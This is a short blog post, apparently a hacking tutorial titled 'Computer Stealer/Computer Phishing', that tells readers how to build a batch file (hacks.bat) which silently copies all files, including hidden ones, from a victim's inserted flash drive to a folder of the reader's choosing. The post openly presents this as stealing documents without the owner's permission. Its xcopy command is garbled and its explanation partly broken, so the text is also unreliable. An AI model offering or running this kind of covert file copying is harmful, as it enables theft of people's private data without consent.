Computer Stealer/Computer Phishing

The last article i wrote was about phishing with your flash drive.Now it comes to mind how cool it will be if can we you steal document with your system.All you need to do if offer your system to the victim who will be willing to insert his/her external storage.
open cmd  
type copy con hacks.bat click enter
type xcopy b:f:opied/h/s/c/q/i"remove" click enter 
type exit or click f6
it will create a batch file named hacks.bat
With this code you can automatically copy files without the owner's permission.
NOTE open this files whenever someone inserts external storage into your sysytem then click on this file he/she data will be copied to the folder you specify
To explain the code above
Xcopy :is a command that is used to copy files
b:-is the name of the pen drive. Drive name is replaced with your drive name
F:opied- is the name if the folder where you want the copied data to be placed."make sure you replace with your own folder
H: is used to copy hidden files

Comments

Popular Posts